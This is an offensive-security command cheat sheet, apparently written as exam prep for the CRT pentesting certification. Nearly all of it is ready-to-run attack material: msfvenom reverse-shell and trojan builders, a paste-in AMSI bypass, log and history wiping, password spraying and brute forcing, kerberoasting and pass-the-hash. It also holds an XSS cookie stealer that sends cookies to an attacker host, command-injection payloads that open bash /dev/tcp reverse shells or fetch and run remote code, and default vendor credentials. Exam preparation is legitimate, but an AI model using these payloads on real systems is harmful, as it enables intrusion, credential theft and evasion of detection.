A handbook of commands for the CRT exam
Command | Description |
nmap -sV -p- -sU -o <IP> -oN nmap.txt |
All ports, Os fingerprint, UDP ports, Aggressive |
nmap -T4 -v -oA myshares --script smb-enum-shares --script-args smbuser=,smbpass= -p445 [IP] |
Check for shares |
nmap -sP <x.x.x.0>/24 nmap -sn <x.x.x.x>/24 |
Host discovery on a network |
nmap -O -T5 -PE -F --osscan-limit --max-rtt-timeout 100ms --max-parallelism 100 --min-hostgroup 100 -oX out.xml -iL ip_networks.txt |
Fast |
sudo nmap -PE -sn <x.x.x.x>/24 |
Host discovery on a network, better for windows as sometimes ICMP ping packets are dropped |
for i in $(seq 1 254); do (ping -c 1 10.2.2.${i} | grep "bytes from" &); done; |
Living of the Land host enum |
nmap -R -sL -dns-server <server> x.x.x.0/24 |
DNS reverse lookup on IP range |
nmap <IP> -sS |
Syn scan |
namp <IP> -sA |
Ack scan |
nmap -n -Pn -vv -O -sV –script smb-enum*,smb-ls,smb-mbenum,smb-os-discovery,smb-s*,smb-vuln*,smbv2* -vv |
safe SMB scripts |
nmap -sSU -p53 --script dns-nsec-enum --script-agrs dns-nsec-enum.domains=<domain> <nameserver> |
Hostname enumeration using nmap |
namp --script broadcast-dhcp-discover |
Enumerate DHCP server |
nmap -sL <ip>/24 | grep "(" | awk '{printf("%s %s\\n, $5,$6");}' |
Reverse DNS Sweeping |
nmap -sY <IP> |
Looks for SCTP services with INIT/COOKIE ECHO chunk type |
dnsdict -s -t 32 <domain> |
Enumerate IPv6 servers via DNS grinding |
smbclient -U user \\\\\\\\<IP>\\\\<share> |
SMB connect |
smbmap -H <IP> -R |
Recursively list all SMB shares and subfolders |
enum4linux -a <IP> |
ENumerate WIndows and Linux Samba systems |
rpcclient -U "" <target> |
RPC Null authentication |
nslookup |
A record of a domain |
nslookup -query=mx redhat.com |
Mail Exchange records |
nslookup -query=ns redhat.com |
Name server = maps a domain to a list of DNS servers |
nslookup -query=SOA redhat.com |
Authoritative information of a domain |
tcpdump -i eth0 -w out.pcap |
Capture packets on eth0 and write to file |
tcpdump -i eth0 port 80 dst |
Capture HTTP traffic to endpoint |
tcpdump -i eth0 -tttt dst <ip> and not net <ip>/24 |
Show connections to a specific IP |
tcpdump -i eth0 'icmp[icmptype] == icmp-echoreply' |
Print all ping responses (use backticks not ‘) |
tcpdump -i eth0 -c 50 -tttt 'udp and port 53' |
Capture 50 DNS packets and print timestamp (use backticks not ‘) |
tcpdump -x |
Hex output in packet capture |
tcpdump port <port_number> |
filter by port |
tcpdump portrange 21-45 |
Filter port range |
tcpdump src <x.x.x.x> dst <x.x.x.x> |
filter by src/ destination of packets |
tcpdump -S |
get entire packet |
xwd -display <ip>:) -root -out /tmp/test.xpm |
Capture remote X11 Windows and convert to JPG |
xwud -in /tmp/test1.xpm |
convert /tmp/test.xpm -resize 1280x1024 /tmp/test.jpg |
iptables-save -c > <file> |
Dump iptables rules to stdout |
iptables-restor <file> |
Restore iptables rules |
iptables -L -v --line-numbers |
LIst all iptables rules with line numbers |
iptables -F |
Flush all iptables rules |
CHange default policy for rules that don’t match the rules |
iptables -A output -o <iface> -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT |
Allow SSH on port 22 OUTBOUND |
iptables -A INPUT -i <iface> -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT |
Allow SSH on port 22 OUTBOUND |
dig -x <IP> |
Domain lookup |
dig axfr example.com @ns1.example.com |
DNS Zone transfer |
dig <domain> AAAA |
IPv6 address of domain |
dig <domain> MX |
Mail records |
dig <domain> soa |
SOA records/ emergency email in second column |
dig <domain> ns |
Name servers |
dig <domain> txt |
TXT records |
dig @nserver_kerberos.tcp.fqdn SRV +short |
Discover domain controllers |
echo "1" > /proc/sys/net/ipv4/ip_forward |
turn on ip forwarding |
iptables -t nat -A PREROUTING -p tcp -i eth0 -j DNAT -d <pivotip> --dport 443 -to-destination <attack_ip>:443 |
All 3 below needed for port forwarding |
iptables -t nat -A POSTROUTING -p tcp -i eth0 -j SNAT -s <target subnet cidr> -d <attackip> --dport 443 -to-source |
iptables -t filter -I FORWARD 1 -j ACCEPT |
sudo iptables -A FORWARD -i <interface-between-box1&2> -o <interface-between-box2&3> -j ACCEPT |
Forward traffic coming from interface 1 through interface 2 |
sudo iptables -A FORWARD -i <interface-between-box2&3> -o <interface-between-box1&2> -m state --state ESTABLISHED,RELATE -j ACCEPT |
Forward traffic coming from interface 2 through to interface 1 |
sudo iptables -t nat -A POSTROUTING -o <interface-between-box2&3> -j MASQUERADE |
Masquerade source IP in TCP packets (for getting internet connection through a machine that has internet access) |
ssh -R <anyPort>:localhost:22 username@target Then ssh username@localhost -p<port> |
Reverse Reverse port forward (Allows you to ssh out of a machine that is blocked from external ssh access) |
ssh -L 9090: dennis@ |
port forward internal port |
echo "nameserver x.x.x.x > /etc/resolv.conf" |
Add DNS Server |
base64 -w 0 <fileName> and then echo "<base64String>"" | base64 -d > out.txt |
Transfer files via base64 |
scp <file> user@x.x.x.x:/tmp/file |
Put file scp |
scp user@x.x.x.x:/tmp/file /tmp/file |
Get file scp |
mount /dev/sda1 /mnt/test |
Mount files |
mount <ip>:/share /mnt/nfs |
mount nfs share |
mount -o nolock -t nfs -o proto=tcp,port=2049 /mnt |
mount nfs share |
sudo mount -o vers=3 ./user2 |
Change NFS version, version4 obfuscates userIDs and GIDs |
sudo usermod -u <UID> <username> |
change UID of user to be able to read nfs files |
mount -t cifs -o username=<user>,password=<password>,domain=example.com //WIN_PC_IP/<share name> /mnt/windows |
mount a Windows share |
net use x: \\filesvr001\folder1 <password> /user:domain01\jsmith /savecred /p:no |
mount a Windows share |
sort -u |
sort unique lines |
tar cf file.tar files |
Create .tar from files |
tar xf file.tar |
Extract .tar files |
tar czf file.tar.gz files |
Create .tar.gz files from files |
tar xzf file.tar.gz |
Extract .tar.gz files |
tar cjf file.tar.bz2 files |
Create .tar.bz2 files from files |
tar xjf files.tar.bz2 |
Extract .tar.bz2 files |
gzip file |
Compress/ rename file |
gzip -d file.gzip |
Extract gzip files |
upx -9 -o out.exe orig.exe |
UPX compresses orig.exe into out.exe |
zip -r <zipname.zip> <directory> |
Zips directory |
split -b 9K \<file> <prefix> |
splits file into 9K sized chunks |
awk 'sub("$"."\r")' unix.txt > win.txt |
Convert unix file to windows compatible file |
find -i - name <file> -type *.pdf |
FInd pdf files |
find / -perm 4000 =o -perm -2000 -exec ls - lbd {} \; |
Search for suid files |
dos2unix file |
Windows file to unix file |
cat /etc/*syslog*.conf | grep -v "^#" |
List of log files |
grep 'href' <file> | cut -d"/" -f3 | grep <url> | sort -u |
Strip links in url.com (remove \ they are meant to be pipes not OR) |
echo "" > /var/log/auth.log |
Clear auth logs |
echo "" > ~/var/log/.bash_history |
clear commands history |
export HISFILESIZE=0 |
Set history max file size 0 |
export HISTSIZE=0 |
Set history commands to 0 |
kill -9 $$ |
Kill current session |
ln /dev/null #/.bash_history -sf |
Send all bash history commands to /dev/null |
hydra -L users -P passwords -M 21.txt ftp |
Bruteforce FTP |
hydra -L users -P passwords -M 22.txt ssh |
Bruteforce SSH |
hydra -L users -P passwords -M 445.txt smb |
Bruteforce SMB |
crackmapexec <protocol> -U <UserList> -p "PasswordToSpray" |
Password spray |
crackmapexec <ip> -u Administrator -p 'P@ssw0rd' -x whoami |
Command execution |
crackmapexec smb -u Administrator -p 'P@ssw0rd' -M mimikatz o COMMAND='privilege::debug' |
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP> |
bruteforce SNMP, msfconsole, nmap and hydra can also be used |
rdesktop <IP> |
rdp into windows machine |
rlogin -l <ip> |
login with R* Services to server with rlogin port open - if misconfigured dont need a password |
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V |
bruteforce rlogin |
rexec <ip> |
remote command execution on ip |
rwho <ip> |
rsh <ip> |
Remote shell on system |
rsh <IP> <Command> |
rsh <IP> -l domain\user <Command> |
rcp file.txt <ip>:/path/to/file.txt |
rstat |
Returns kernel performance statistics |
ruptime |
python /usr/share/responder.py |
rouge DHCP server (half duplex so does not receive responses from legitimate DHCP server, only the clients broadcast) |
ettercap -Tar cpature.pcap (or -i <interface>) |
Grab hashes from RIP authentication |
ping6 -c2 -I <interface> ff02::1 |
Identify IPV6 neighbours |
xwd -root -screen -silent -display > screenshot.xwd convert screenshot.xwd screenshot.png |
Take screenshot of server through vulnerable X11 port |
xwininfo -root -tree -display |
Shows information for X service |
xspy <ip> |
Log keystrokes though vulnerable X11 service |
sudo ifconfig <interface> mtu 1200 |
Fix ssh hanging issue |
rdesktop <ip> |
RDP option |
xfreerdp /v:<ip> /u:<username> |
RDP when rdesktop doesn’t work |
remmina |
RDP option |
cat output.csv | sed 's/,/ ,/g' | column -t -s, | less -S |
View csv output in command line (use arrow keys to scroll horizontally) |
xq <filename> cat <filename> | xq |
jq but for xml files!!!!! |
GetUserSPNs.py -request -dc-ip <DOMAIN.FULL>/<USERNAME>:<PASSWORD> -outputfile hashes.kerberoast |
Kerberoast users |
nbtscan <IP_addr> |
NBT scan / enumerate NetBios (ports 137, 138, 139) |
sslscan <hostname/ip> |
TLS/SSL check - look for vulnerable versions or potential for downgrade attacks, insecure ciphers etc. |
Linux exploits⌗
finger x@$RHOST | base64 -d > "$LFILE"
Command | Description |
sudo find . -exec /bin/sh \; -quit |
sudo vim -c ':!/bin/sh' |
sudo base64 "$LFILE" | base64 --decode |
sudo mysql -e '\! /bin/sh' |
Solaris OS⌗
Command | Description |
dladm show-link |
Checking network device status |
svcadm -t enable service |
Start service |
svcs service |
display service status |
svcs -a |
display list of services |
zpool create pool <pool_name> RAID device_name |
Create volume group |
zfs create <File_system_name> |
Create file system |
zfs mount <FIle_system_name> |
Mount file system |
zoneadm -z <zone_name> install |
Basically like docker pull <image name> |
showrev -P |
Patch information |
/etc/ftpd/tfpusers |
Not a command i know, but file location for FTP access control on solaris |
Command | Description |
use auxiliary/scanner/http/dir_scanner |
Scan for directories |
use auxiliary/scanner/http/jboss_vulnscan |
Jboss scan |
use exploit/multi/http/jboss_maindeployer |
Jboss deploy |
use auxiliary/scanner/mssql/mssql_login |
MySQL cred scan |
use exploit/windows/mssql/mssql_payload |
MySQL payload |
use auxiliary/scanner/mysql/mysql_version |
MySQL version scan |
use auxiliary/scanner/mysql/mysql_login |
MySQL login |
use auxiliary/scanner/oracle/oracle_login |
Oracle login |
use exploit/windows/dcerpc/ms03_026_dcom |
use exploit/windows/smb/ms06_040_netapi |
use exploit/windows/smb/ms08_067_netapi |
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index |
run post/windows/gather/win_privs |
Show privs of current user |
use exploit/windows/local/bypassuac (check if x86/64 and set target) |
bypass UAC on windows7 |
load mimikatz -> wdigest |
dump creds |
load incongnito -> list_tokens -> impersonate_token |
Use tokens |
use post/windows/gather/credentials/gpp |
run post/windows/gather/local_admin_search_enum |
Test other machines |
use exploit/multi/handler |
Payload handler/ listener for rev shells |
use auxiliary/scanner/ipmi/ipmi_version |
Scan for ipmi interfaces (part of BMCs) |
use auxiliary/scanner/ipmi/ipmi_dumphashes |
dump ipmi hashes |
use auxiliary/gather/kerberos_enumusers |
Enumerate users |
use auxiliary/scanner/oracle/sid_enum |
Enumerate oracle database SID values |
use auxiliary/scanner/oracle/sid_brute |
unix/x11/x11_keyboard_exec |
Get shell via vulnerable x11 service |
Command | Description |
msfvenom -p windows/exec CMD='net localgroup administrators <user> /add' -f exe-service -o common.exe |
Service executable malicious payload |
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -o payload.exe |
Windows meterpreter shell |
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe -o payload.exe |
Windows reverse shell |
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT = -f py (or c) -b '\x00' -o shellcode.py (or .c) |
Generate shell code |
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf -o payload.elf |
Linux reverse shell |
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -x /usr/bin/nc -k -f elf -o payload.elf |
Create trojan out of a legit binary |
msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST= LPORT= -f elf -e x86/shikata_ga_nai -b '\x00' > solshell.elf |
Solaris OS |
Command | Description |
/accepteula |
If ever using CLI sysinternals tools you need to accept the EULA or you get a really annoying prompt every time you run the tool |
reg.exe ADD HKCU\Software\Sysinternals /v EulaAccepted /t REG_DWORD /d 1 /f |
Removing eula prompt from sysinternals tools |
certutil.exe -urlcache -f bad.exe |
download file with certutil |
Invoke-WebRequest -Uri "" -OutFile "c:\tmp\nc.exe" |
Download file |
IEX (New-Object Net.WebClient).DownloadString('') |
Download file |
powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString(''); Invoke-AllChecks" |
Loads powershell script straight into memory |
powershell -nop -ep bypass |
Bypass powershell execution policy |
$file = [convert]::ToBase64String((Get-Content -path "c:\tmp\20220613215954_BloodHound.zip" -Encoding byte)) |
Convert file to base64 for file transfer (copy b64 output and decode on your local kali machine) |
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("base64String")) |
Convert from base64 (take base64 input and decode it on the server for file transfer) |
netstat -ano |
Port scan, same as netstat -tunlp |
sc query net start wmic service get name,startname Get-Service OR Get-Service | Where-Object {$_.Status -eq "Running"} OR services |
List all services on the machine (good for finding a service for CLSIDs) |
whoami /priv |
Enumerate privileges for current user |
whoami /all |
net user |
Enumerate all users on the host |
ipconfig /all |
Enumerate current AD Domain |
wmic printer list brief |
Enumerate printers |
Get-Printer |
Enumerate printers |
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon |
auto logon credentials |
sc config <service> binpath="<path of payload>" |
Exploit weak service permissions |
sc start/stop <> |
start/stop a service |
sc qc <service> |
Query service configuration/permissions |
icacls |
permissions of a file/ directory |
net share |
List all SMB shares |
net use X: \\Server\Share |
Map network share to drive X (then cd X:\ ) - can use any unused letter |
nbtstat -n |
Retrieve NetBios names of local device |
nbtstat -A <IP_addr> |
Retrieve NetBios name of remote host (01 and 1D indicate the master browser, 03 is the user) |
findstr /spin "password" *.* |
Find the string password in all file types |
Import-Module <module i.e PowerUp.ps1> |
Import powershell scrips to enhance powershell functionality |
SCHTASKS /CREATE /SC ONSTART /TN "MyTasks\PERSISTENCE" /TR "c:\windows\temp\implant.exe |
Create a scheduled task for persistence (HOURLY, DAILY, WEEKLY, MONTHLY, ONCE, ONSTART, ONLOGON, ONIDLE, and ONEVENT.) |
ldapdomaindump -u <username> -p <password> |
dump ldap |
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ |
Bypass Amsii⌗
Just copy and paste this entire block into powershell
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
public static extern IntPtr LoadLibrary(string name);
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
LDAP enumeration⌗
import ldap3
server = ldap3.Server('', port =389)
connection = ldap3.Connection(server, "<username>", "<password>") #leave blank for null authentication
x = connection.search(search_base='DC=example,DC=com', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*') # domain here is example.com
# ---- Old filter ----
# search_filter='(&(objectCategory=computer)(ms-MCS-AdmPwd=*))', search_scope='SUBTREE', attributes=['ms-MCS-AdmPwd','SAMAccountname'])
Dump the entire LDAP domain
ldapdomaindump --user 'DOMAIN\USER' --password $PASSWORD --outdir ldapdomaindump $DOMAIN_CONTROLLER
Active Directory (Unauthenticated)⌗
Command | Description |
enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP> |
Null and Guest access to SMB services |
smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP> |
NUll and Guest access to SMB services |
smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L // |
Null and Guess access to SMB services |
nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP> |
LDAP enumeration |
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP> |
User enumeration |
python GetNPUsers.py <domain.com>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast |
ASREPRoast users |
rpcclient -U '' -N |
GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> |
technically an authenticated attack but usually done before network foothold |
Active Directory (Authenticated)⌗
Command | Description |
net user /domain , Get-DomainUser , wmic useraccount get name,sid |
Different ways to extract all domain users |
net group "domain admins" /domain |
Check domain admins group |
GetADUsers.py -all -dc-ip domain.com/username , enum4linux -a -u "user" -p "password" <DC IP> |
Different ways to extract all domain users from linux |
ConsoleHost_history |
PowerShell history |
net users |
Enumerate all users |
net localgroup Administrators |
Enumerate users in the administrator group |
whoami /all |
All privileges for your current user |
Tasklist /SVC |
LIst running services and processes |
tasklist /v /fi "username eq system" |
Filter for processes running as SYSTEM |
procdump.exe -accepteula -ma <proc_name_tasklist> |
Memory dump running processes |
net start; wmic service list brief; sc query; Get-Service |
Get a list of services |
accesschk.exe -ucqv <Service_Name> |
sysinternals tool, Check rights for different groups |
net view /all /domain [domainname] |
All shares on the domain |
net share |
Current shares |
netstat -ano |
Look for open ports |
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>null | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" |
Credentials (remove \ from \|) |
Get-DomainUser -PreauthNotRequired -verbose |
List ASREProastable users using powerview (powershell) |
Get-ADTrust -Identity <domain> |
Get outbound trust details for domain root.local (powershell) |
systeminfo | findstr /B /C:"Domain" or echo %userdomain% or ipconfig /all |
List current domain (remove \ from \|) |
runas /user:USERNAME “C:\full\path\of\Program.exe” |
run a command as a different user |
runas /user:ComputerName\administrator cmd |
run command as different user on different computer |
runas /user:myDomain\administrator cmd |
runas /user:<domain\user> cmd |
python3 /usr/share/impacket/wmiexec.py test.local/john:password123@ |
from linux gain interactive shell on windows machine (needs WMI open) |
WMIC /node:target-computer-name process call create “cmd.exe /c task-name” |
evil-winrm -i -u Administrator -p ‘MySuperSecr3tPass123!’ |
evilwinRM shell from linux |
evil-winrm -i -S -k <private key> -c <public key> |
evilWinRM with private key |
psexec \\computer_name -u username -p password cmd.exe |
Sysinternals command to run remote commands |
Get-AdUser -Server "DC.Domain_A.local" -Identity "Name_of_account" -Properties * |
Get user info of user in separate domain within trust |
impacket-addcomputer '<domain>/user:password' -method LDAPS -computer-name "testPC" -computer-pass 'password' |
Add a computer to a AD domain |
Get-ADComputer <computerName> |
powershell command to grab properties like SID, DNS hostname of a computer in a domain |
Get-NetUser -SPN | select serviceprincipalname |
PowerView, get user service accounts |
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmd.exe |
mimkatz pass the hash (needs administrator privileges) |
Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #Example: MSSQLSvc/mgmt.domain.local |
Get TGS in memory |
nltest /domain_trusts |
view domain trusts |
Checking permissions of the processes binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
Checking permissions of the folders of the processes binaries
for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
Scenario: you’ve compromised a host and you are trying to pivot further into the internal network to machines that are not internet facing. What do you do? create a reverse socks proxy connection with chisel between your kali and the compromised host to forward traffic to the interna network. This way you can nmap/ rdp into internal hosts straight from your kali!!!!
make sure to include this line in /etc/proxychains4.conf
socks5 1080
Command | Description |
chisel.exe server -p 8000 -socks5 -reverse |
Set up “server” on your kali |
chisel64.exe client R:1080:socks |
connect back to server from the compromised host |
proxychains nmap -p 1-1000 -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output |
speed up nmap through proxychains |
seq 1 1000 | xargs -P 50 -I{} proxychains -q nmap -p {} -sT -Pn --open -n -T4 --min-parallelism 100 --min-rate 1 --oG proxychains_nmap --append-output |
really fing fast nmap through proxy chains |
grep open/tcp proxychains_nmap | sort | uniq | awk {'print($5)};' | cut -d "/" -f 1,3,5 | sort -n |
grep output for the open ports |
How does chisel work?⌗
- good question…
Other tunneling commands⌗
Command | Description |
ssh -L user@ |
SSH port forward. Use this to forward packets from to via Now you can RDP into the box with the address |
ssh -D 1080 yourlab@ |
SSH Socks proxy. Make sure to configure /etc/proxychains4.conf like with chisel. Now just run proxychains <yourcommand> |
ssh -L 9090: user@ |
Remote/Reverse port forward. Forward traffic from port 9090 on the internal network to 9090 on your localhost. |
Command | Description |
<script> document.write('<img src="http://x.x.x.x:8000/?cookie=' + document.cookie + '" />) </script> |
Cookie stealer with script tags |
<img src=1 href=1 onerror="javascript:console.log('XSS Test')"> |
<img src/onerror=alert(1)> |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> |
<svg onload=alert(1)> |
<svg id=x onfocus=alert(1)> |
<svg width="400" height="400"> <image href="text:/etc/passwd" height="400" width="400"/></svg> |
SSRF through PDF generator |
<img src='s' onerror="$('body').append('<script src=\'[http://attacker.com/xss.js](http://attacker.com/xss.js)\'>')"> |
load malicious js payload from your malicious site (if inline scripts don’t work) |
SQL injection manually⌗
Command | Description |
' union select null,null,null,null,null from information_schema.tables;-- |
Enumerate amount of columns |
' UNION SELECT NULL,table_name,table_schema,null,null from information_schema.tables;-- |
Grab table names |
' UNION SELECT null,column_name,null,null,null from information_schema.columns where table_name='<TableName>';-- |
Grab column names in table |
' UNION SELECT null,Username,Password,null,null from <TableName>;-- |
Exfiltrate information |
Command injection⌗
Command | Description |
SomeFunctionality=NormalInput;id |
&id |
&&id |
id%00 |
`id` | use backticks |
|ls |
||ls |
$(ls) |
> /var/www/html/out.txt |
Not code execution but could be interesting to redirect output |
< /etc/passwd |
Could send input into something |
vuln= %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php |
vuln=; bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 |
vuln= bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 |
vuln= -i >& /dev/tcp/<IP>/<PORT> 0>&1 |
vuln= && bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 |
Spacing sometimes can make a difference |
?cmd={payload} |
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi |
time based data exfiltration - THis payload will sleep for 5 ms if the name of the user starts with a s |
system('cat%20/etc/passwd') |
\n/bin/ls -al\n |
%0A/usr/bin/id%0A |
Directory enumeration⌗
Command | Description |
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt |
Basic enumeration |
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fw <number> |
Filter by words |
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fl <number of lines> |
Filter by number of lines |
ffuf -u http://<IP>/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-medium-words.txt -fc <response code> |
Filter out response codes i.e. 404, 403 |
gobuster dns -d <domain.com> -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt |
Directory enumeration |
Automated Vuln scanning⌗
Command | Description |
- port 3306
Command | Description |
select version(); |
get version |
show databases; |
show databases |
show tables; |
show tables |
use <database name>; |
enter that database |
select * from <table name>; |
select info from a table |
mysql.user |
password hashes location |
SELECT * FROM mysql.user* |
Password hashes |
- port 5432
Command | Description |
psql -U <myuser> <IP> |
psql -h <host> -U <username> -d <database> |
Remote connection |
psql -h <host> -p <port> -U <username> -W <password> <database> |
Remote connection |
SELECT version(); |
Get version info |
\list |
List databases |
\c <database> |
Use database |
\d |
List tables |
\du+ |
List user toles |
\conninfo |
Connection information |
SHOW hba_file; |
find config files |
SELECT usename, passwd from pg_shadow; |
Grab password hashes |
createdb <database name> |
Create a database |
psql -d <database name> |
Login locally to database |
REATE TABLE users (ID INT PRIMARY KEY NOT NULL, username character (255) NOT NULL, password character (255) NOT NULL); |
Create table |
INSERT INTO users (ID, username, password) values ('1', 'administrator', '736a125730d192f1560ac2f56798ac958c5f84b086b48a8bc9da3217f9477c6b'); |
Insert data into table |
DROP TABLE <table_name>; |
Delete table |
ALTER USER <user> WITH PASSWORD '<password>'; |
Change password for user |
Metasploit modules⌗
msf> use auxiliary/scanner/postgres/postgres_hashdump
msf> use auxiliary/scanner/postgres/postgres_schemadump
msf> use auxiliary/admin/postgres/postgres_readfile
msf> use exploit/linux/postgres/postgres_payload
msf> use exploit/windows/postgres/postgres_payload
- TCP/1433 - SQL server port
- TCP/2433 - Hidden mode
- TCP/1434 Named instance - Monitor port
- UDP/1434 SQL Server Browse
- Password hashes are stored in
Command | Description |
sqlcmd -u <user> -p <password> |
Login to mssql locally in cmd |
'EXEC xp_cmdshell 'powershell -c Invoke-WebRequest -Uri "" -OutFile "C:\windows\Temp\nc.exe"'; -- |
Command execution with xp_cmdshell (dir, type, ls etc do not work as stdout won’t be displayed) |
sqlmap -u "htpL//<url>" --os-shell |
Command execution through sqlmap xp_cmdshell |
SELECT @@version |
DB version |
SELECT name FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='mytable'); |
List columns |
EXEC sp_databases |
Show database instances |
EXEC sp_helpdm <dbname> |
Show database description |
USE <database name> |
EXEC sp_tables |
Show tables |
SELECT name, password FROM Maste.dbo.sysxlogins |
Show password hases |
Default accounts
- SQL 2000 = SA user, blank password
- SQL 2005 = SA user, password not set
Oracle DB⌗
- Port 1521
- Oracle use something called the Transparent Network Substrate (TNS) for authenticating to their databases. It is a protocol that handles authentication outside of the database.
- Oracle used SID values to uniquely identify databases
- SID values can be bruteforced to discover databases within an Oracle environment (version and below)
use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/sid_brute
- Password hashes are stored in
nmap -sSV -p1521 -n <IP>
Command | Description |
SELECT * FROM v$version;* | DB Version |
SELECT instance_name FROM v$instance | Current DB |
SELECT name FROM v$database | Current DB |
SELECT DISTINCT owner FROM all_tables; | List DBs |
SELECT user FROM dual; | current user |
SELECT username FROM all_users ORBERY BY username; | List users |
SELECT column_name FROM all_tab_columns; | List tables |
SELECT name, password, astatus FROM sys.user$; | List password hashes |
SELECT username, password FROM dba_users | Show databse user/password |
SELECT name, password FROM SYS.USER$ | Shows passwords in DES hash |
SELECT name, spare4 FROM SYS.USER$ | Show passwords in SHA-1 |
Default accounts⌗
Username | Password |
Connect to Oracle DB⌗
CONNECT username/password@<IP>:<PORT>
$ export ORACLE_HOME=/path/to/oracle/home #usually /usr/lib/oracle/<version>/client64/
sqlplus sys as sysdba
sqlplus username/password@<IP>/<database>
TNS Connectivity⌗
tnscmd10g version -h <IP>
Command | Description |
sqlmap -u "http://<url>" |
check its injectable |
sqlmap -u "http://<url> --current-db |
Grab current database |
sqlmap -u "http://<url> -D "database" --tables |
Grab table names for current DB |
sqlmap -u "http://<url> -D "database" -T "tableName" --dump |
Get contents of table |
Password cracking⌗
hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
hashcat -m 13100 --force -a 0 hashes.kerberoast rockyou.txt
john --wordlist=passwords_kerb.txt hashes.asreproast
john hashList.txt
john --show hashList.txt # show password once hash has been cracked
john --format=krb5tgs --wordlist=rockyou.txt hashes.kerberoast
Default credentials⌗
Vendor | Username | Passwords |
APC | apc, device | apc |
Brocade | admin | admin123, password, brocade, fibranne |
Cisco | admin, cisco, enable, hsa, pnadmin, ripeop, root, shelladmin | admin, Admin123, default, password, secur4u, cisco, Cisco, _Cisco, cisco123, C1sco!123_, Cisco123, Cisco1234, TANDBERG, change_it, 12345, ipics, pnadmin, diamond, hsadb, c, cc, attack, blender, changeme |
Citrix | root, nsroot, nsaint, vdiadmin, kvm, cli, admin | Citrix321, nsroot, nsmaint, kaviza, kaviza123, freebsd, public, rootadmin, wanscaler |
D-Link | admin, user | private, admin, user |
Dell | root, user1, admin, vkernel, cli | calvin, 123456, password, vkernel, Stor@age!, admin |
EMC | admin, root, sysadmin | EMCPAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
HP/3Com | admin, root, vcx, app, spvar, manage, hpsupport, opc_op | admin, password, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, access, config, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !manage, !admin |
Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
